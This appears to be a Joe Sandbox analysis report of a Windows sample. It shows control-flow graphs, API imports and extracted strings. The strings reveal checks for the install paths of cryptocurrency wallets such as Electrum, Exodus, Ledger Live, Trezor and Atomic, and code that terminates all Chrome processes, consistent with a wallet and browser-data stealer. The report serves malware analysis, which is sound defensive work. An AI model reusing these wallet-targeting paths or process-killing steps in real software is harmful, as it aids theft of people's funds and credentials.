                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$BufferEnumFreeUser_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$Atomic$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Program Files\Trezor Suite$C:\ProgramData\%s\exodus$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor$exists$status
                                                                                                                                                                  • API String ID: 3930398341-2954937949
                                                                                                                                                                  • Opcode ID: bcadf20640420031074605f38039830a50cdc84bb0a0e0709c0706a48c0f022b
                                                                                                                                                                  • Instruction ID: 2ccf593f2c47ba0f65204b1fa971b51fa4b77e0ba65b95bd929f255d4d506ca9
                                                                                                                                                                  • Opcode Fuzzy Hash: bcadf20640420031074605f38039830a50cdc84bb0a0e0709c0706a48c0f022b
                                                                                                                                                                  • Instruction Fuzzy Hash: BA51D772B19B419AE710EF61E8802ADB3A5FB5CBA8F804135EE9D57B98DF38D141C704
                                                                                                                                                                  Function 00007FF72C9EE440 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 229fileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 5706 7ff72c9ee440-7ff72c9ee480 5707 7ff72c9ee495-7ff72c9ee49e 5706->5707 5708 7ff72c9ee482-7ff72c9ee489 5706->5708 5710 7ff72c9ee4a0-7ff72c9ee4a3 5707->5710 5711 7ff72c9ee4ba-7ff72c9ee4bc 5707->5711 5708->5707 5709 7ff72c9ee48b-7ff72c9ee490 5708->5709 5714 7ff72c9ee714-7ff72c9ee73a call 7ff72c9f2770 5709->5714 5710->5711 5715 7ff72c9ee4a5-7ff72c9ee4ad 5710->5715 5712 7ff72c9ee712 5711->5712 5713 7ff72c9ee4c2-7ff72c9ee4c6 5711->5713 5712->5714 5716 7ff72c9ee59d-7ff72c9ee5c4 call 7ff72c9ee770 5713->5716 5717 7ff72c9ee4cc-7ff72c9ee4cf 5713->5717 5719 7ff72c9ee4b3-7ff72c9ee4b6 5715->5719 5720 7ff72c9ee4af-7ff72c9ee4b1 5715->5720 5729 7ff72c9ee5e6-7ff72c9ee5ef 5716->5729 5730 7ff72c9ee5c6-7ff72c9ee5cf 5716->5730 5722 7ff72c9ee4e3-7ff72c9ee4f5 GetFileAttributesExW 5717->5722 5723 7ff72c9ee4d1-7ff72c9ee4d9 5717->5723 5719->5711 5720->5711 5720->5719 5727 7ff72c9ee4f7-7ff72c9ee500 GetLastError 5722->5727 5728 7ff72c9ee548-7ff72c9ee557 5722->5728 5723->5722 5726 7ff72c9ee4db-7ff72c9ee4dd 5723->5726 5726->5716 5726->5722 5727->5714 5731 7ff72c9ee506-7ff72c9ee518 FindFirstFileW 5727->5731 5732 7ff72c9ee55b-7ff72c9ee55d 5728->5732 5735 7ff72c9ee5f5-7ff72c9ee60d GetFileInformationByHandleEx 5729->5735 5736 7ff72c9ee6a3-7ff72c9ee6ac 5729->5736 5733 7ff72c9ee5d1-7ff72c9ee5d9 CloseHandle 5730->5733 5734 7ff72c9ee5df-7ff72c9ee5e1 5730->5734 5737 7ff72c9ee525-7ff72c9ee546 FindClose 5731->5737 5738 7ff72c9ee51a-7ff72c9ee520 GetLastError 5731->5738 5739 7ff72c9ee55f-7ff72c9ee567 5732->5739 5740 7ff72c9ee569-7ff72c9ee597 5732->5740 5733->5734 5741 7ff72c9ee755-7ff72c9ee75a call 7ff72ca01774 5733->5741 5734->5714 5744 7ff72c9ee635-7ff72c9ee64e 5735->5744 5745 7ff72c9ee60f-7ff72c9ee61b GetLastError 5735->5745 5742 7ff72c9ee6ae-7ff72c9ee6c2 GetFileInformationByHandleEx 5736->5742 5743 7ff72c9ee6fb-7ff72c9ee6fd 5736->5743 5737->5732 5738->5714 5739->5716 5739->5740 5740->5712 5740->5716 5763 7ff72c9ee75b-7ff72c9ee760 call 7ff72ca01774 5741->5763 5747 7ff72c9ee6c4-7ff72c9ee6d0 GetLastError 5742->5747 5748 7ff72c9ee6e8-7ff72c9ee6f8 5742->5748 5751 7ff72c9ee6ff-7ff72c9ee703 5743->5751 5752 7ff72c9ee73b-7ff72c9ee73f 5743->5752 5744->5736 5753 7ff72c9ee650-7ff72c9ee654 5744->5753 5749 7ff72c9ee61d-7ff72c9ee628 CloseHandle 5745->5749 5750 7ff72c9ee62e-7ff72c9ee630 5745->5750 5747->5750 5757 7ff72c9ee6d6-7ff72c9ee6e1 CloseHandle 5747->5757 5748->5743 5749->5750 5758 7ff72c9ee767-7ff72c9ee76f call 7ff72ca01774 5749->5758 5750->5714 5751->5712 5759 7ff72c9ee705-7ff72c9ee710 CloseHandle 5751->5759 5754 7ff72c9ee741-7ff72c9ee74c CloseHandle 5752->5754 5755 7ff72c9ee74e-7ff72c9ee753 5752->5755 5760 7ff72c9ee656-7ff72c9ee670 GetFileInformationByHandleEx 5753->5760 5761 7ff72c9ee69c 5753->5761 5754->5741 5754->5755 5755->5714 5764 7ff72c9ee6e3 5757->5764 5765 7ff72c9ee761-7ff72c9ee766 call 7ff72ca01774 5757->5765 5759->5712 5759->5741 5767 7ff72c9ee693-7ff72c9ee69a 5760->5767 5768 7ff72c9ee672-7ff72c9ee67e GetLastError 5760->5768 5762 7ff72c9ee6a0 5761->5762 5762->5736 5763->5765 5764->5750 5765->5758 5767->5762 5768->5750 5772 7ff72c9ee680-7ff72c9ee68b CloseHandle 5768->5772 5772->5763 5775 7ff72c9ee691 5772->5775 5775->5750
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2398595512-578493202
                                                                                                                                                                  • Opcode ID: 084919010e652b5f85a0bab5836ad3d9afdd541a1c584fafeb2c470db68b38aa
                                                                                                                                                                  • Instruction ID: a88de1b1d7d8b10aa2fde3f08d24bf600ca457489baecb30f5986f625e86c782
                                                                                                                                                                  • Opcode Fuzzy Hash: 084919010e652b5f85a0bab5836ad3d9afdd541a1c584fafeb2c470db68b38aa
                                                                                                                                                                  • Instruction Fuzzy Hash: B5917531A0CAC246F7646B25BC04679B2A4EF75BB0F940731D9BE476D4EE3CE8458B60
                                                                                                                                                                  Function 00007FF72C9B5D60 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 265sleepprocessCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 5776 7ff72c9b5d60-7ff72c9b5daf CreateToolhelp32Snapshot 5777 7ff72c9b5db1-7ff72c9b5de5 call 7ff72c9d44a0 5776->5777 5778 7ff72c9b5e20-7ff72c9b5e3a Process32FirstW 5776->5778 5787 7ff72c9b5e19-7ff72c9b5e1b 5777->5787 5788 7ff72c9b5de7-7ff72c9b5df9 5777->5788 5779 7ff72c9b5e40-7ff72c9b5e58 5778->5779 5780 7ff72c9b5fe4-7ff72c9b6009 CloseHandle call 7ff72c9b39d0 5778->5780 5783 7ff72c9b5e60-7ff72c9b5e7d 5779->5783 5790 7ff72c9b6014 5780->5790 5791 7ff72c9b600b-7ff72c9b6012 5780->5791 5786 7ff72c9b5e80-7ff72c9b5e88 5783->5786 5786->5786 5792 7ff72c9b5e8a-7ff72c9b5eb5 call 7ff72c9d4160 5786->5792 5789 7ff72c9b610a-7ff72c9b6139 call 7ff72c9f2770 5787->5789 5793 7ff72c9b5e14 call 7ff72c9f2790 5788->5793 5794 7ff72c9b5dfb-7ff72c9b5e0e 5788->5794 5796 7ff72c9b601e-7ff72c9b6030 call 7ff72c9b39d0 5790->5796 5791->5796 5806 7ff72c9b5eb7-7ff72c9b5ebf 5792->5806 5807 7ff72c9b5edb 5792->5807 5793->5787 5794->5793 5799 7ff72c9b6180-7ff72c9b6185 call 7ff72c9fcd30 5794->5799 5808 7ff72c9b6032-7ff72c9b6046 5796->5808 5809 7ff72c9b609f-7ff72c9b60b9 5796->5809 5810 7ff72c9b5ec2-7ff72c9b5eca 5806->5810 5811 7ff72c9b5edd-7ff72c9b5ee1 5807->5811 5814 7ff72c9b6050-7ff72c9b6059 5808->5814 5812 7ff72c9b613a-7ff72c9b6155 call 7ff72c9d44a0 5809->5812 5813 7ff72c9b60bb-7ff72c9b60d6 call 7ff72c9d44a0 5809->5813 5810->5807 5815 7ff72c9b5ecc-7ff72c9b5ed3 5810->5815 5816 7ff72c9b5ee3-7ff72c9b5ef5 5811->5816 5817 7ff72c9b5f18-7ff72c9b5f1a 5811->5817 5833 7ff72c9b6106 5812->5833 5837 7ff72c9b6157-7ff72c9b6169 5812->5837 5813->5833 5834 7ff72c9b60d8-7ff72c9b60ea 5813->5834 5823 7ff72c9b6062-7ff72c9b6080 5814->5823 5824 7ff72c9b605b-7ff72c9b6060 5814->5824 5815->5810 5825 7ff72c9b5ed5-7ff72c9b5ed9 5815->5825 5818 7ff72c9b5f10-7ff72c9b5f13 call 7ff72c9f2790 5816->5818 5819 7ff72c9b5ef7-7ff72c9b5f0a 5816->5819 5821 7ff72c9b5f20-7ff72c9b5f36 OpenProcess 5817->5821 5822 7ff72c9b5fce-7ff72c9b5fde Process32NextW 5817->5822 5818->5817 5819->5799 5819->5818 5821->5822 5829 7ff72c9b5f3c-7ff72c9b5f5c 5821->5829 5822->5780 5822->5783 5830 7ff72c9b6084-7ff72c9b6090 Sleep call 7ff72c9b39d0 5823->5830 5831 7ff72c9b6082 5823->5831 5824->5830 5825->5811 5835 7ff72c9b5f60-7ff72c9b5f67 5829->5835 5842 7ff72c9b6095-7ff72c9b609d 5830->5842 5831->5830 5833->5789 5838 7ff72c9b6101 call 7ff72c9f2790 5834->5838 5840 7ff72c9b60ec-7ff72c9b60ff 5834->5840 5835->5835 5841 7ff72c9b5f69-7ff72c9b5f7c call 7ff72c9d44a0 5835->5841 5837->5838 5839 7ff72c9b616b-7ff72c9b617e 5837->5839 5838->5833 5839->5799 5839->5838 5840->5799 5840->5838 5846 7ff72c9b5fb0-7ff72c9b5fc8 TerminateProcess CloseHandle 5841->5846 5847 7ff72c9b5f7e-7ff72c9b5f90 5841->5847 5842->5809 5842->5814 5846->5822 5848 7ff72c9b5f92-7ff72c9b5fa5 5847->5848 5849 7ff72c9b5fab call 7ff72c9f2790 5847->5849 5848->5799 5848->5849 5849->5846
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotTerminateToolhelp32_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$All Chrome instances closed.$Failed to create process snapshot.$No Chrome instances found or failed to close.$Terminating Chrome process with PID $chrome.exe
                                                                                                                                                                  • API String ID: 2017165370-1680418533
                                                                                                                                                                  • Opcode ID: 51d06e4672338ef495216ec558f695adddee4ec15272c40506ae06f82aa901c2
                                                                                                                                                                  • Instruction ID: c492117f028dd3e589ce3b23de1e4308cb3cfcf8c8f1afd6824a09aa29b1f056
                                                                                                                                                                  • Opcode Fuzzy Hash: 51d06e4672338ef495216ec558f695adddee4ec15272c40506ae06f82aa901c2
                                                                                                                                                                  • Instruction Fuzzy Hash: B7B1F962B18A4592EA14E715EC40379E3A1FF957F4F904331EAED076E9DE3CE5818B10
                                                                                                                                                                  Function 00007FF72C9B9030 Relevance: 16.4, Strings: 13, Instructions: 199COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskEnumUser_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$Atomic$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Program Files\Trezor Suite$C:\ProgramData\%s\exodus$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor
                                                                                                                                                                  • API String ID: 2880872648-4258732720
                                                                                                                                                                  • Opcode ID: 704f971cbf8b29ea90b7d1f6c78561c3ab623a82f039f29d964e06d0727a3049
                                                                                                                                                                  • Instruction ID: 8ba1240f0cf61650545a14229cdd74b202b229fa7a710bd6de1056c2dcebc4f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 704f971cbf8b29ea90b7d1f6c78561c3ab623a82f039f29d964e06d0727a3049
                                                                                                                                                                  • Instruction Fuzzy Hash: 20A17232914BC685E320DF34DC81BE97761FBAA35CF905325EA8C26959EF78A2D4C740
                                                                                                                                                                  Function 00007FF72CA0D2C8 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 335timeCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 6958 7ff72ca0d2c8-7ff72ca0d303 call 7ff72ca0c9c0 call 7ff72ca0c9c8 call 7ff72ca0ca30 6965 7ff72ca0d309-7ff72ca0d314 call 7ff72ca0c9d0 6958->6965 6966 7ff72ca0d52d-7ff72ca0d579 call 7ff72c9fcd60 call 7ff72ca0c9c0 call 7ff72ca0c9c8 call 7ff72ca0ca30 6958->6966 6965->6966 6972 7ff72ca0d31a-7ff72ca0d324 6965->6972 6993 7ff72ca0d6b7-7ff72ca0d725 call 7ff72c9fcd60 call 7ff72ca1695c 6966->6993 6994 7ff72ca0d57f-7ff72ca0d58a call 7ff72ca0c9d0 6966->6994 6973 7ff72ca0d346-7ff72ca0d34a 6972->6973 6974 7ff72ca0d326-7ff72ca0d329 6972->6974 6977 7ff72ca0d34d-7ff72ca0d355 6973->6977 6976 7ff72ca0d32c-7ff72ca0d337 6974->6976 6979 7ff72ca0d339-7ff72ca0d340 6976->6979 6980 7ff72ca0d342-7ff72ca0d344 6976->6980 6977->6977 6981 7ff72ca0d357-7ff72ca0d36a call 7ff72ca0a168 6977->6981 6979->6976 6979->6980 6980->6973 6983 7ff72ca0d373-7ff72ca0d381 6980->6983 6988 7ff72ca0d36c-7ff72ca0d36e call 7ff72ca08340 6981->6988 6989 7ff72ca0d382-7ff72ca0d38e call 7ff72ca08340 6981->6989 6988->6983 6999 7ff72ca0d395-7ff72ca0d39d 6989->6999 7011 7ff72ca0d727-7ff72ca0d72e 6993->7011 7012 7ff72ca0d733-7ff72ca0d736 6993->7012 6994->6993 7001 7ff72ca0d590-7ff72ca0d59b call 7ff72ca0ca00 6994->7001 6999->6999 7003 7ff72ca0d39f-7ff72ca0d3b0 call 7ff72ca0fd10 6999->7003 7001->6993 7010 7ff72ca0d5a1-7ff72ca0d5c4 call 7ff72ca08340 GetTimeZoneInformation 7001->7010 7003->6966 7013 7ff72ca0d3b6-7ff72ca0d40c call 7ff72ca199f0 * 4 call 7ff72ca0d1e4 7003->7013 7026 7ff72ca0d5ca-7ff72ca0d5eb 7010->7026 7027 7ff72ca0d68c-7ff72ca0d6b6 call 7ff72ca0c9b8 call 7ff72ca0c9a8 call 7ff72ca0c9b0 7010->7027 7016 7ff72ca0d7c3-7ff72ca0d7c6 7011->7016 7017 7ff72ca0d738 7012->7017 7018 7ff72ca0d76d-7ff72ca0d780 call 7ff72ca0a168 7012->7018 7071 7ff72ca0d40e-7ff72ca0d412 7013->7071 7022 7ff72ca0d73b 7016->7022 7023 7ff72ca0d7cc-7ff72ca0d7d4 call 7ff72ca0d2c8 7016->7023 7017->7022 7032 7ff72ca0d78b-7ff72ca0d7a6 call 7ff72ca1695c 7018->7032 7033 7ff72ca0d782 7018->7033 7028 7ff72ca0d740-7ff72ca0d76c call 7ff72ca08340 call 7ff72c9f2770 7022->7028 7029 7ff72ca0d73b call 7ff72ca0d544 7022->7029 7023->7028 7034 7ff72ca0d5ed-7ff72ca0d5f3 7026->7034 7035 7ff72ca0d5f6-7ff72ca0d5fd 7026->7035 7029->7028 7055 7ff72ca0d7a8-7ff72ca0d7ab 7032->7055 7056 7ff72ca0d7ad-7ff72ca0d7bf call 7ff72ca08340 7032->7056 7040 7ff72ca0d784-7ff72ca0d789 call 7ff72ca08340 7033->7040 7034->7035 7042 7ff72ca0d5ff-7ff72ca0d607 7035->7042 7043 7ff72ca0d611 7035->7043 7040->7017 7042->7043 7050 7ff72ca0d609-7ff72ca0d60f 7042->7050 7048 7ff72ca0d613-7ff72ca0d687 call 7ff72ca199f0 * 4 call 7ff72ca01824 call 7ff72ca0d7dc * 2 7043->7048 7048->7027 7050->7048 7055->7040 7056->7016 7073 7ff72ca0d418-7ff72ca0d41c 7071->7073 7074 7ff72ca0d414 7071->7074 7073->7071 7076 7ff72ca0d41e-7ff72ca0d443 call 7ff72ca16718 7073->7076 7074->7073 7081 7ff72ca0d446-7ff72ca0d44a 7076->7081 7083 7ff72ca0d459-7ff72ca0d45d 7081->7083 7084 7ff72ca0d44c-7ff72ca0d457 7081->7084 7083->7081 7084->7083 7086 7ff72ca0d45f-7ff72ca0d463 7084->7086 7088 7ff72ca0d4e4-7ff72ca0d4e8 7086->7088 7089 7ff72ca0d465-7ff72ca0d48d call 7ff72ca16718 7086->7089 7091 7ff72ca0d4ea-7ff72ca0d4ec 7088->7091 7092 7ff72ca0d4ef-7ff72ca0d4fc 7088->7092 7098 7ff72ca0d4ab-7ff72ca0d4af 7089->7098 7099 7ff72ca0d48f 7089->7099 7091->7092 7094 7ff72ca0d517-7ff72ca0d526 call 7ff72ca0c9b8 call 7ff72ca0c9a8 7092->7094 7095 7ff72ca0d4fe-7ff72ca0d514 call 7ff72ca0d1e4 7092->7095 7094->6966 7095->7094 7098->7088 7104 7ff72ca0d4b1-7ff72ca0d4cf call 7ff72ca16718 7098->7104 7102 7ff72ca0d492-7ff72ca0d499 7099->7102 7102->7098 7105 7ff72ca0d49b-7ff72ca0d4a9 7102->7105 7110 7ff72ca0d4db-7ff72ca0d4e2 7104->7110 7105->7098 7105->7102 7110->7088 7111 7ff72ca0d4d1-7ff72ca0d4d5 7110->7111 7111->7088 7112 7ff72ca0d4d7 7111->7112 7112->7110
                                                                                                                                                                  APIs
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D30D
                                                                                                                                                                    • Part of subcall function 00007FF72CA0C9D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA0C9E4
                                                                                                                                                                    • Part of subcall function 00007FF72CA08340: RtlFreeHeap.NTDLL(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08356
                                                                                                                                                                    • Part of subcall function 00007FF72CA08340: GetLastError.KERNEL32(?,?,?,00007FF72CA12B26,?,?,?,00007FF72CA12EA3,?,?,00000000,00007FF72CA133AD,?,?,?,00007FF72CA132DF), ref: 00007FF72CA08360
                                                                                                                                                                    • Part of subcall function 00007FF72C9FCD60: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72C9FCD0F,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72C9FCD69
                                                                                                                                                                    • Part of subcall function 00007FF72C9FCD60: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72C9FCD0F,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72C9FCD8E
                                                                                                                                                                    • Part of subcall function 00007FF72CA1695C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA168A7
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D2FC
                                                                                                                                                                    • Part of subcall function 00007FF72CA0CA30: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72CA0CA44
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D572
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D583
                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF72CA0D594
                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF72CA0D7D4), ref: 00007FF72CA0D5BB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                  • String ID: *L\(&.$Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                  • API String ID: 4070488512-1557497274
                                                                                                                                                                  • Opcode ID: a1c57b64b8f7897bd49e6a6251379af1a2d842da872961474b1cb5948339e0d9
                                                                                                                                                                  • Instruction ID: 09f6f7e8806088d4e3a1f3b9f3db594dfd41b155fcc575d0c95aa0d9bce86766
                                                                                                                                                                  • Opcode Fuzzy Hash: a1c57b64b8f7897bd49e6a6251379af1a2d842da872961474b1cb5948339e0d9
                                                                                                                                                                  • Instruction Fuzzy Hash: 44D1BD26E0864286F720BF35AC51AB9A671FFA47E4FC04136EA4D47686DF3DE441CB60
                                                                                                                                                                  Function 00007FF72CA0E170 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 7147 7ff72ca0e170-7ff72ca0e1e3 call 7ff72ca0dd54 7150 7ff72ca0e1fd-7ff72ca0e207 call 7ff72ca0c6e4 7147->7150 7151 7ff72ca0e1e5-7ff72ca0e1ee call 7ff72ca01654 7147->7151 7157 7ff72ca0e209-7ff72ca0e220 call 7ff72ca01654 call 7ff72ca01674 7150->7157 7158 7ff72ca0e222-7ff72ca0e28b CreateFileW 7150->7158 7156 7ff72ca0e1f1-7ff72ca0e1f8 call 7ff72ca01674 7151->7156 7171 7ff72ca0e53e-7ff72ca0e55e 7156->7171 7157->7156 7161 7ff72ca0e308-7ff72ca0e313 GetFileType 7158->7161 7162 7ff72ca0e28d-7ff72ca0e293 7158->7162 7164 7ff72ca0e315-7ff72ca0e350 GetLastError call 7ff72ca015e8 CloseHandle 7161->7164 7165 7ff72ca0e366-7ff72ca0e36d 7161->7165 7167 7ff72ca0e2d5-7ff72ca0e303 GetLastError call 7ff72ca015e8 7162->7167 7168 7ff72ca0e295-7ff72ca0e299 7162->7168 7164->7156 7182 7ff72ca0e356-7ff72ca0e361 call 7ff72ca01674 7164->7182 7174 7ff72ca0e36f-7ff72ca0e373 7165->7174 7175 7ff72ca0e375-7ff72ca0e378 7165->7175 7167->7156 7168->7167 7169 7ff72ca0e29b-7ff72ca0e2d3 CreateFileW 7168->7169 7169->7161 7169->7167 7179 7ff72ca0e37e-7ff72ca0e3d3 call 7ff72ca0c5fc 7174->7179 7175->7179 7180 7ff72ca0e37a 7175->7180 7185 7ff72ca0e3f2-7ff72ca0e423 call 7ff72ca0dad4 7179->7185 7186 7ff72ca0e3d5-7ff72ca0e3e1 call 7ff72ca0df5c 7179->7186 7180->7179 7182->7156 7193 7ff72ca0e429-7ff72ca0e46b 7185->7193 7194 7ff72ca0e425-7ff72ca0e427 7185->7194 7186->7185 7192 7ff72ca0e3e3 7186->7192 7195 7ff72ca0e3e5-7ff72ca0e3ed call 7ff72ca084b8 7192->7195 7196 7ff72ca0e48d-7ff72ca0e498 7193->7196 7197 7ff72ca0e46d-7ff72ca0e471 7193->7197 7194->7195 7195->7171 7198 7ff72ca0e53c 7196->7198 7199 7ff72ca0e49e-7ff72ca0e4a2 7196->7199 7197->7196 7201 7ff72ca0e473-7ff72ca0e488 7197->7201 7198->7171 7199->7198 7202 7ff72ca0e4a8-7ff72ca0e4ed CloseHandle CreateFileW 7199->7202 7201->7196 7204 7ff72ca0e4ef-7ff72ca0e51d GetLastError call 7ff72ca015e8 call 7ff72ca0c824 7202->7204 7205 7ff72ca0e522-7ff72ca0e537 7202->7205 7204->7205 7205->7198
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                  • String ID:
